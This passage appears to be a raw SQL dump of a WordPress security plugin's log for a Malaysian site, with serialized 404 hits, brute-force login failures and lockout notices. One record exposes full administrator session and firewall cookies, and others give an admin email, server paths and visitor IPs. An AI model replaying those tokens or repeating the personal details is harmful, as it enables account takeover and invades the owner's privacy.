Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYv1AFRed5u6rkjAaVY@LwAAAAo\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.6.198.118\";s:11:\"REMOTE_PORT\";s:5:\"54494\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYv1AFRed5u6rkjAaVY@LwAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569453312.876\";s:12:\"REQUEST_TIME\";s:10:\"1569453312\";}}','notice','2019-09-25 23:15:14','2019-09-25 23:15:13',31180144,32708728,'https://bintara.com.my/blog/wp-login.php',1,0,'103.6.198.118'),(27050,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 07:15:13\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 23:15:13\";s:14:\"lockout_expire\";s:19:\"2019-09-30 11:15:13\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 03:15:13\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-25 23:15:14','2019-09-25 23:15:13',31261656,32708728,'https://bintara.com.my/blog/wp-login.php',1,0,'103.6.198.118'),(27051,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-25 23:15:14','2019-09-25 23:15:13',31884360,32708728,'https://bintara.com.my/blog/wp-login.php',1,0,'103.6.198.118'),(27052,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b7f1d1d47cce023e27431a9c8e41ed67\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"58005\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYv8i1Red5u6rkjAaVY-TAAAABM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569455243.848\";s:12:\"REQUEST_TIME\";s:10:\"1569455243\";}}','notice','2019-09-25 23:47:25','2019-09-25 23:47:24',30823072,32634856,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27053,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=c41a239dda4c9a8e53876aa3358d3e78\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwIN3IO9r9oxFSVqE@LgAAAAMc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.6.245.199\";s:11:\"REMOTE_PORT\";s:5:\"48520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwIN3IO9r9oxFSVqE@LgAAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569458231.151\";s:12:\"REQUEST_TIME\";s:10:\"1569458231\";}}','notice','2019-09-26 00:37:13','2019-09-26 00:37:11',31178984,32708208,'https://bintara.com.my/2019/wp-login.php',1,0,'103.6.245.199'),(27054,0,'lockout','host-lockout::103.6.245.199','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"103.6.245.199\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 08:37:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-26 00:37:11\";s:14:\"lockout_expire\";s:19:\"2019-09-30 12:37:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 04:37:11\";s:12:\"lockout_host\";s:13:\"103.6.245.199\";}','action','2019-09-26 00:37:15','2019-09-26 00:37:11',31261152,32708208,'https://bintara.com.my/2019/wp-login.php',1,0,'103.6.245.199'),(27055,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"103.6.245.199\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 08:37:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-26 00:37:11\";s:14:\"lockout_expire\";s:19:\"2019-09-30 12:37:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 04:37:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-26 00:37:15','2019-09-26 00:37:11',31261096,32708208,'https://bintara.com.my/2019/wp-login.php',1,0,'103.6.245.199'),(27056,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-26 00:37:15','2019-09-26 00:37:11',31884616,32708208,'https://bintara.com.my/2019/wp-login.php',1,0,'103.6.245.199'),(27057,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:62:\"Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv 11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.17.132.158\";s:11:\"REMOTE_PORT\";s:5:\"51403\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwKE8IxHKnBK@s1FldbIgAAAUA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569458708.0501\";s:12:\"REQUEST_TIME\";s:10:\"1569458708\";}}','notice','2019-09-26 00:45:13','2019-09-26 00:45:08',30821520,32634856,'https://bintara.com.my/?page_id=18',1,0,'185.17.132.158'),(27058,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"336-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"2A6F6EAF-8A5B-4399-9F49-9668890DD3DC\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"336-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwKaMIxHKnBK@s1FldbVAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"49212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwKaMIxHKnBK@s1FldbVAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569458792.6399\";s:12:\"REQUEST_TIME\";s:10:\"1569458792\";}}','notice','2019-09-26 00:46:36','2019-09-26 00:46:33',31497936,33314832,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.128'),(26948,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:15:\"expired_session\";a:1:{i:0;s:20:\"Please log in again.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:43:\"/wp-login.php?interim-login=1&wp_lang=en_US\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"144-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:871:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C7666d1ce86dd205c7585f82f8f746a43fec60d35baf243ae9d603987f35459c0; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569376332%7CDHME1XFrUhlecJWYWREpsqI0IQP4JrrN9xSe7eOnBLf%7C96d187f4ef032996fbf808f94ac1a8bab67286bc737d9ad6ec25670084de842b; wp-saving-post=1-saved; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C22dcac49362989fcdd4214ab673d9065add0865294c218fd5bbfddb12474bd7a; wp-settings-time-1=1569371464; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D0%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wordpress_test_cookie=WP+Cookie+check; tk_ai=jetpack%3AGroV7gMQ3Z1TvsipPvo%2FWU6e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:102:\"https://bintara.com.my/wp-admin/post.php?post=1449&action=elementor&ip-geo-block-auth-nonce=28ec50e1da\";s:19:\"HTTP_SEC_FETCH_MODE\";s:15:\"nested-navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"interim-login=1&wp_lang=en_US\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"60698\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYrJ8IhQ4pD4smMfGAQA8wAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569376752.2249\";s:12:\"REQUEST_TIME\";s:10:\"1569376752\";}}','notice','2019-09-25 01:59:13','2019-09-25 01:59:12',30819240,32357728,'https://bintara.com.my/wp-login.php?interim-login=1&wp_lang=en_US',1,0,'115.132.145.112'),(26930,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/3\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYpvEhaIaq52cc-9XMJ@6wAAAAg\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.215.42\";s:11:\"REMOTE_PORT\";s:5:\"43661\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYpvEhaIaq52cc-9XMJ@6wAAAAg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569353490.2508\";s:12:\"REQUEST_TIME\";s:10:\"1569353490\";}}','notice','2019-09-24 19:31:31','2019-09-24 19:31:30',30751800,32563392,'https://bintara.com.my/3',1,0,'149.202.215.42'),(26931,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:32:\"https://bintara.com.my/wp-admin/\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 